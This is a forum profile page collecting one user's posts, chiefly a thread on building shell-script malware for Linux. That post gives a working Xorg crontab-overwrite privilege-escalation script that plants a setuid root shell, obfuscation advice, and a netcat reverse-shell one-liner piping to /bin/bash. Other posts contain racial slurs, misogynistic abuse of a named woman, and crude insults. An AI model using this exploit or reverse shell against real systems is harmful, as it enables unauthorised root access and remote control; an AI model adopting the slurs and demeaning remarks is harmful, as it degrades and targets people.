User Controls
Thanked Posts by Sophie
-
2021-09-28 at 10:28 AM UTC in Amputation: dominate arm above elbow
Originally posted by General Butt.Naked I couldnt even leave the house. I lived on the sofa for the entire time, with a puke bucket and a rotation of blankets so i wouldnt sweat through to the cushions.
Man i dont miss that shit.
Nah fam i can imagine. When i went through the worst withdrawal at least i had my gf to take care of me and her friend would stop by periodically for emotional support. I guess that was a small blessing. Pretty sure my gf kept me alive by forcing me to drink a little water every day and have a little bit of custard or apple sauce lol, damn. I don't miss that shit either.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-09-26 at 12:25 AM UTC in Sh/Bash based malware for *Nix.
Originally posted by troon You don't have a fucking clue what you're talking about, do you?
Last i checked you were the one that was asking a million questions about the subject at hand. See those four 'thanks' my post got those are from people who definitely know what they are talking about. Just because you're too fucking ignorant to understand what's going on in this thread doesn't mean that everyone is as incompetent as you. I even fucking spelled it out for you. If everyone else here understands the subject matter then maybe you should consider tat you're actually the one that doesn;t have a fucking clue.
Why don't you shut the fuck up read up on offensive security and shell scripting, and look into the vulnerability i mentioned in the OP. Then come back and to talk shit to me.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-09-20 at 9:02 AM UTC in Its a little bit funny guys (about older women)You're really overcompensating for your noncery.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-17 at 11:27 AM UTC in Choke a bitch to kill the covid.Use a pant leg. Experimental jean therapy.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-20 at 7:49 AM UTC in Panic attacksThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-19 at 10 AM UTC in what guns should i buy nextI'm on tor and i'm blocking all JS so i can't see what video you posted but by 'AR pistol' do you mean a carbine? Or a pistol that shoots 556 or 762?
You should get a S&W 1911 Model, 45 ACP. I love those pistols they are beautiful, and you'll love it too. And 45 ACP is a superior caliber to a 9 IMHO. Kel-tec's KSG-25 is nice but i'd go with a Mossberg 940 JM Pro. Doesn't look as tacticool but it's a beautiful shotgun regardless. Traditional design but it's a 12 gauge semi automatic shotgun. It's fucking dope.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-09-18 at 7:13 PM UTC in General Mark Milley is a patriot, a hero and a brave man.
Originally posted by vindicktive vinny no, he was great until he wasnt.
like gambling, its important to know when to stop and cut loses.
Some tried. But a full force coup and even palace coup was really largely made impossible through Hitler's style of governing. Something called Führerprinzip. This is when you have multiple people and/or departments/ministries work and compete towards the same goal to see who will fulfill the vision of The Fuhrer the best. It generally prevents coalitions against you from forming while leaving a lot of freedom in the hands of the department heads to gather the resources and manpower and such to perform their duty according to their own interpretation of The Fuhrer's will. This is over simplified, but it's a pretty lean form of government and a high risk/reward form of government too. When things go well they go really well, when they don't well...The following users say it would be alright if the author of this post didn't die in a fire! -
2021-09-13 at 9:14 PM UTC in Haha, i just did a CRIME!The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-18 at 2:06 PM UTC in What text editor do you use?The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-15 at 9:21 PM UTC in "Put men in anti-rape training until they prove they won't rape"Guilty until proven innocentThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-15 at 8:08 AM UTC in Haha, i just did a CRIME!The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-15 at 8:18 AM UTC in Haha, i just did a CRIME!The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-13 at 9:18 PM UTC in Haha, i just did a CRIME!The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-11 at 5:45 PM UTC in Theres a place in Scotland named NiggThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-10 at 8:35 PM UTC in Whats your ultimate sexual fantasy?The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-10 at 11:49 AM UTC in Whats your ultimate sexual fantasy?I am sure you can guess.The following users say it would be alright if the author of this post didn't die in a fire!
-
2018-09-11 at 11:36 AM UTC in Hannah Hays, possible retard, can no longer get work
Originally posted by MORALLY SUPERIOR BEING 2.0 - The GMO Reckoning Her southern drawl is relaxing.
"I want to work with tech and wires"
What do you do with people who aren't super smart? Just force them to become porn hookers, and compete with the entire imported third world for low wage jobs?
When it comes to girls/women, i want them to get a good husband and be faithful, then i want them to raise the kids and make fucking dinner. It is the way things ought to be and seems fair if the guy is out working all day every day except for Sunday, because on Sunday we ought to praise our LORD Jesus The Christ.
AMEN!
Also, Hannah Hays seems like a qt too bad she's a literal porn whore and thus damaged goods. Into the incinerator with her. THOT!!!The following users say it would be alright if the author of this post didn't die in a fire! -
2021-08-14 at 7:01 PM UTC in Afghanistan collapsing to Taliban, globalists leaving Kabul like SaigonAmerica shouldn't have been there in the first place. Same with Vietnam. American foreign policy has been disastrous since the beginning of WWI, and possibly before that.
America deserves the coming collapse. The American people to a lesser degree obviously.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-09-05 at 4:36 PM UTC in What fate shall befall my enemy?Obviously the smart move is give the key to someone that hates the guy even more than i do and let the chips fall where they may.The following users say it would be alright if the author of this post didn't die in a fire!
